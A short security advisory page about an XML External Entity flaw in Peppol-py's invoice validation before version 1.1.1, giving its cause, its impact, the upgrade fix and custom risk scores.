Primary

Context

Peppol-py XXE Vulnerability in XML Invoice Validation

Vulnerability

A vulnerability allowing XML External Entity (XXE) attacks has been identified in Peppol-py versions prior to 1.1.1. This issue arises from the default configuration of the Saxon XML processor, which permits access to external resources. When validating XML-based invoices, the parser could be manipulated to read files from the filesystem and send their contents to a remote host.

Impact

Exploitation of this vulnerability allows for XXE attacks, where an attacker can read local files on the server and potentially send this data to an external location.

Remediation

Users can upgrade to Peppol-py version 1.1.1 or later, where this vulnerability has been fixed.

Added: Nov 28, 2025, 4:18 AM

Updated: Nov 28, 2025, 4:18 AM

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

0.8

exploitability

6.3

remediation

7.7

relevance

1.2

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

0.8

exploitability

6.3

remediation

7.7

relevance

1.2

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Peppol-py XXE Vulnerability in XML Invoice Validation

Vulnerability

Impact

Remediation

Affected Products

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating